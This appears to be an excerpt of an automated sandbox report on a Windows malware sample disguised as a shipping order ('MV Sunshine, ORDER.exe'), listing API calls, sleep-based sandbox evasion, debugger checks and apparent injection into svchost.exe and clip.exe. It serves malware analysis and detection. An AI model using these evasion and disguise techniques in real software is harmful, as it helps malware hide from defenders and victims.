            Source: C:\Windows\SysWOW64\clip.exe TID: 7688Thread sleep count: 9720 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exe TID: 7688Thread sleep time: -19440000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe TID: 7804Thread sleep time: -80000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe TID: 7804Thread sleep time: -43500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe TID: 7804Thread sleep count: 37 > 30Jump to behavior
            Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe TID: 7804Thread sleep time: -37000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009E4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_009E4696
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009EC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_009EC9C7
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009EC93C FindFirstFileW,FindClose,0_2_009EC93C
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009EF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009EF200
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009EF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009EF35D
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009EF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_009EF65E
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009E3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009E3A2B
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009E3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009E3D4E
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009EBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_009EBF27
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_028CBC20 FindFirstFileW,FindNextFileW,FindClose,3_2_028CBC20
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_00984AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00984AFE
            Source: QAjjirwAoAEExvw.exe, 00000007.00000002.4133260511.00000000011FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
            Source: clip.exe, 00000003.00000002.4132740210.0000000002A55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
            Source: firefox.exe, 00000008.00000002.2165854586.000001B39686C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllII
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397096E rdtsc 1_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004173E3 LdrLoadDll,1_2_004173E3
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009F41FD BlockInput,0_2_009F41FD
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_00983B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00983B4C
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009B5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_009B5CCC
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_009FC304 LoadLibraryA,GetProcAddress,0_2_009FC304
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_022234C0 mov eax, dword ptr fs:[00000030h]0_2_022234C0
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_02223520 mov eax, dword ptr fs:[00000030h]0_2_02223520
            Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exeCode function: 0_2_02221E70 mov eax, dword ptr fs:[00000030h]0_2_02221E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03928397 mov eax, dword ptr fs:[00000030h]1_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03928397 mov eax, dword ptr fs:[00000030h]1_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03928397 mov eax, dword ptr fs:[00000030h]1_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E388 mov eax, dword ptr fs:[00000030h]1_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E388 mov eax, dword ptr fs:[00000030h]1_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E388 mov eax, dword ptr fs:[00000030h]1_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395438F mov eax, dword ptr fs:[00000030h]1_2_0395438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395438F mov eax, dword ptr fs:[00000030h]1_2_0395438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EC3CD mov eax, dword ptr fs:[00000030h]1_2_039EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]1_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]1_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]1_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]1_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]1_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]1_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039383C0 mov eax, dword ptr fs:[00000030h]1_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039383C0 mov eax, dword ptr fs:[00000030h]1_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039383C0 mov eax, dword ptr fs:[00000030h]1_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039383C0 mov eax, dword ptr fs:[00000030h]1_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B63C0 mov eax, dword ptr fs:[00000030h]1_2_039B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E3F0 mov eax, dword ptr fs:[00000030h]1_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E3F0 mov eax, dword ptr fs:[00000030h]1_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E3F0 mov eax, dword ptr fs:[00000030h]1_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039663FF mov eax, dword ptr fs:[00000030h]1_2_039663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C310 mov ecx, dword ptr fs:[00000030h]1_2_0392C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03950310 mov ecx, dword ptr fs:[00000030h]1_2_03950310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A30B mov eax, dword ptr fs:[00000030h]1_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A30B mov eax, dword ptr fs:[00000030h]1_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A30B mov eax, dword ptr fs:[00000030h]1_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B035C mov eax, dword ptr fs:[00000030h]1_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B035C mov eax, dword ptr fs:[00000030h]1_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B035C mov eax, dword ptr fs:[00000030h]1_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B035C mov ecx, dword ptr fs:[00000030h]1_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B035C mov eax, dword ptr fs:[00000030h]1_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B035C mov eax, dword ptr fs:[00000030h]1_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FA352 mov eax, dword ptr fs:[00000030h]1_2_039FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D437C mov eax, dword ptr fs:[00000030h]1_2_039D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E284 mov eax, dword ptr fs:[00000030h]1_2_0396E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E284 mov eax, dword ptr fs:[00000030h]1_2_0396E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0283 mov eax, dword ptr fs:[00000030h]1_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0283 mov eax, dword ptr fs:[00000030h]1_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0283 mov eax, dword ptr fs:[00000030h]1_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402A0 mov eax, dword ptr fs:[00000030h]1_2_039402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402A0 mov eax, dword ptr fs:[00000030h]1_2_039402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h]1_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C62A0 mov ecx, dword ptr fs:[00000030h]1_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h]1_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h]1_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h]1_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h]1_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h]1_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h]1_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h]1_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h]1_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h]1_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402E1 mov eax, dword ptr fs:[00000030h]1_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402E1 mov eax, dword ptr fs:[00000030h]1_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402E1 mov eax, dword ptr fs:[00000030h]1_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392823B mov eax, dword ptr fs:[00000030h]1_2_0392823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A250 mov eax, dword ptr fs:[00000030h]1_2_0392A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936259 mov eax, dword ptr fs:[00000030h]1_2_03936259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B8243 mov eax, dword ptr fs:[00000030h]1_2_039B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B8243 mov ecx, dword ptr fs:[00000030h]1_2_039B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934260 mov eax, dword ptr fs:[00000030h]1_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934260 mov eax, dword ptr fs:[00000030h]1_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934260 mov eax, dword ptr fs:[00000030h]1_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392826B mov eax, dword ptr fs:[00000030h]1_2_0392826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]1_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]1_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]1_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B019F mov eax, dword ptr fs:[00000030h]1_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A197 mov eax, dword ptr fs:[00000030h]1_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A197 mov eax, dword ptr fs:[00000030h]1_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A197 mov eax, dword ptr fs:[00000030h]1_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03970185 mov eax, dword ptr fs:[00000030h]1_2_03970185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EC188 mov eax, dword ptr fs:[00000030h]1_2_039EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EC188 mov eax, dword ptr fs:[00000030h]1_2_039EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A061E5 mov eax, dword ptr fs:[00000030h]1_2_03A061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]1_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]1_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]1_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE1D0 mov eax, dword ptr fs:[00000030h]1_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F61C3 mov eax, dword ptr fs:[00000030h]1_2_039F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F61C3 mov eax, dword ptr fs:[00000030h]1_2_039F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039601F8 mov eax, dword ptr fs:[00000030h]1_2_039601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA118 mov ecx, dword ptr fs:[00000030h]1_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA118 mov eax, dword ptr fs:[00000030h]1_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA118 mov eax, dword ptr fs:[00000030h]1_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA118 mov eax, dword ptr fs:[00000030h]1_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F0115 mov eax, dword ptr fs:[00000030h]1_2_039F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960124 mov eax, dword ptr fs:[00000030h]1_2_03960124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C156 mov eax, dword ptr fs:[00000030h]1_2_0392C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C8158 mov eax, dword ptr fs:[00000030h]1_2_039C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936154 mov eax, dword ptr fs:[00000030h]1_2_03936154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936154 mov eax, dword ptr fs:[00000030h]1_2_03936154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]1_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]1_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov ecx, dword ptr fs:[00000030h]1_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]1_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]1_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393208A mov eax, dword ptr fs:[00000030h]1_2_0393208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F60B8 mov eax, dword ptr fs:[00000030h]1_2_039F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F60B8 mov ecx, dword ptr fs:[00000030h]1_2_039F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C80A8 mov eax, dword ptr fs:[00000030h]1_2_039C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B20DE mov eax, dword ptr fs:[00000030h]1_2_039B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C0F0 mov eax, dword ptr fs:[00000030h]1_2_0392C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039720F0 mov ecx, dword ptr fs:[00000030h]1_2_039720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0392A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039380E9 mov eax, dword ptr fs:[00000030h]1_2_039380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B60E0 mov eax, dword ptr fs:[00000030h]1_2_039B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]1_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]1_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]1_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]1_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4000 mov ecx, dword ptr fs:[00000030h]1_2_039B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6030 mov eax, dword ptr fs:[00000030h]1_2_039C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A020 mov eax, dword ptr fs:[00000030h]1_2_0392A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C020 mov eax, dword ptr fs:[00000030h]1_2_0392C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932050 mov eax, dword ptr fs:[00000030h]1_2_03932050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6050 mov eax, dword ptr fs:[00000030h]1_2_039B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395C073 mov eax, dword ptr fs:[00000030h]1_2_0395C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039307AF mov eax, dword ptr fs:[00000030h]1_2_039307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393C7C0 mov eax, dword ptr fs:[00000030h]1_2_0393C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B07C3 mov eax, dword ptr fs:[00000030h]1_2_039B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039347FB mov eax, dword ptr fs:[00000030h]1_2_039347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039347FB mov eax, dword ptr fs:[00000030h]1_2_039347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039527ED mov eax, dword ptr fs:[00000030h]1_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039527ED mov eax, dword ptr fs:[00000030h]1_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039527ED mov eax, dword ptr fs:[00000030h]1_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE7E1 mov eax, dword ptr fs:[00000030h]1_2_039BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930710 mov eax, dword ptr fs:[00000030h]1_2_03930710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960710 mov eax, dword ptr fs:[00000030h]1_2_03960710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C700 mov eax, dword ptr fs:[00000030h]1_2_0396C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396273C mov eax, dword ptr fs:[00000030h]1_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396273C mov ecx, dword ptr fs:[00000030h]1_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396273C mov eax, dword ptr fs:[00000030h]1_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AC730 mov eax, dword ptr fs:[00000030h]1_2_039AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C720 mov eax, dword ptr fs:[00000030h]1_2_0396C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C720 mov eax, dword ptr fs:[00000030h]1_2_0396C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930750 mov eax, dword ptr fs:[00000030h]1_2_03930750
